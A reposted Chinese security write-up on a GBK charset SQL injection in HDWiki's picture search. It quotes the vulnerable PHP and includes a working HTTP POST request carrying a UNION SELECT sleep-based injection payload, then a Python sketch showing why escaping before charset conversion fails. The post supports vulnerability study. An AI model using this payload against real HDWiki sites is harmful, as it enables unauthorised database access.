HDWiki GBK injection

没穿底裤, January 1, 2020, 03:33:51

In the file control/pic.php, in the dosearch method:

```php
function dosearch(){
    $num = 16;
    $page=isset($this->get[3])? intval($this->get[3]) :'';
    if(empty($page) || !is_numeric($page)){
        $page=1;
    ……
    // User-controlled search term: from POST, or from the URL via haddslashes(urldecode(...))
    $searchtext=isset($this->post['searchtext'])?$this->post['searchtext']:string::haddslashes(urldecode($this->get[2]),1);
    // Charset conversion is applied to the search term here
    $searchtext= string::hiconv(trim($searchtext));
    if(empty($searchtext)){
        $this->message($this->view->lang['pic_no_title'],'BACK',0);
    }

    $start_limit = ($page - 1) * $num;
    // The converted value is passed on to the query builders
    $count=$_ENV['pic']->search_pic_num($searchtext);
    $piclist=$_ENV['pic']->search_pic($searchtext,$start_limit,$num);
```

$searchtext is processed by the hiconv method:

```php
function hiconv($str,$to='',$from='',$force=false) {
    ……
    //$isutf8=preg_match( '/^([\x00-\x7f]|[\xc0-\xdf][\x80-\xbf]|[\xe0-\xef][\x80-\xbf]{2}|[\xf0-\xf7][\x80-\xbf]{3})+$/', $str );
    // UTF-8 heuristic: strings longer than 6 bytes must contain two consecutive three-byte sequences
    $re = strlen($str) > 6 ? '/([\xe0-\xef][\x80-\xbf]{2}){2}/' : '/[\xe0-\xef][\x80-\xbf]{2}/';
    $isutf8 = preg_match($re, $str);

    //$force = (substr($to, 0, 3) == 'utf') ? true : $force;

    // No conversion when the string already looks like the target charset
    if(!$force && $isutf8 && $to=='utf-8' ) return $str;
    if(!$force && !$isutf8 && $to=='gbk' ) return $str;

    if (function_exists('iconv')){
        $str = iconv($from, $to, $str);
    }else{
        require_once(HDWIKI_ROOT.'/lib/Chinese.class.php');
        $ch = new chinese($from,$to);
        if('utf-8'==$from){
            $str = addslashes($ch->convert(stripslashes($str)));
        }else{
            $str = $ch->convert($str);
        }
    }
    return $str;
}
```

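From this we can tell that the input must contain at least two three-byte characters (the pattern used when strlen($str) > 6 requires two consecutive three-byte sequences before the string is treated as UTF-8).
The value then goes into the search_pic_num function: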

```php
function search_pic_num($keyword){
    // $keyword is concatenated directly into both LIKE patterns
    $sql="SELECT count(*) num FROM ".DB_TABLEPRE."attachment p LEFT JOIN ".DB_TABLEPRE."doc d ON p.did=d.did WHERE p.isimage=1 AND d.title LIKE '%$keyword%' OR p.description LIKE '%$keyword%' ORDER BY p.time DESC";
    var_dump($sql);
    return $this->db->result_first($sql);
}
```

```http
POST /hdwiki/index.php?pic-search HTTP/1.1
Host: localhost
Content-Length: 110
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/hdwiki/index.php?pic-piclist-2
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: hd_searchtime=1438309655; hd_sid=EXEY4N; hd_auth=1696Q4sf05UXNEw7ABXrLshePnDPehWzA5SGM3eI0UKFbre6fyfBDNwmYk6yynUCS%2BJa4XRpQFUhSWxX1jcL

searchtext=%E7%9B%B8%e9%8c%a6'  UNION SELECT if(user()=user(),sleep(1),1)#&searchfull=%CD%BC%C6%AC%CB%D1%CB%F7
```
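The byte-level effect of escaping before the UTF-8 to GBK conversion, next to escaping as the last step, as an added example in Python (not HDWiki code and not from the original post). It assumes the value is escaped addslashes-style before hiconv runs, that hiconv converts UTF-8 to GBK, and that the SQL lexer scans the statement byte by byte; all function names are hypothetical.

```python
# Added illustration (not HDWiki code). Assumptions: the value is escaped
# addslashes-style before hiconv(), hiconv() converts UTF-8 to GBK, and the
# SQL lexer scans the statement byte by byte.

def addslashes(data):
    """Byte-wise escape in the style of PHP addslashes()."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):   # ' " \ NUL
            out.append(0x5C)
        out.append(0x30 if b == 0x00 else b)
    return bytes(out)

def to_gbk(utf8):
    """Stand-in for iconv('utf-8', 'gbk', $str)."""
    return utf8.decode("utf-8").encode("gbk")

def free_quotes(literal):
    """Count single quotes that a byte-oriented lexer sees as unescaped."""
    count = i = 0
    while i < len(literal):
        if literal[i] == 0x5C:       # backslash escapes the following byte
            i += 2
            continue
        count += literal[i] == 0x27
        i += 1
    return count

def backslash_trail_chars(text):
    """Non-ASCII characters whose GBK encoding ends in 0x5C (ASCII backslash)."""
    return [c for c in text if ord(c) > 0x7F and c.encode("gbk", "ignore")[-1:] == b"\x5c"]

def escape_then_convert(raw):        # order on the page's GET path
    return to_gbk(addslashes(raw))
def convert_then_escape(raw):        # escaping as the last step
    return addslashes(to_gbk(raw))

# Constructed sample: the two characters from the request above plus a quote.
SAMPLE = "相錦'".encode("utf-8")

if __name__ == "__main__":
    for name, fn in (("escape, then convert", escape_then_convert),
                     ("convert, then escape", convert_then_escape)):
        out = fn(SAMPLE)
        print(f"{name}: {out.hex(' ')} -> unescaped quotes: {free_quotes(out)}")
    print("GBK trail byte 0x5C:", backslash_trail_chars("相錦"))
```

Escaping last only holds while the escaper and the server's lexer agree on the charset; bound query parameters remove that dependency.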

When reposting, please keep the link to this article (CN-SEC中文网: thanks to the original author for their hard work): HDWiki GBK injection, http://cn-sec.com/archives/76455.html
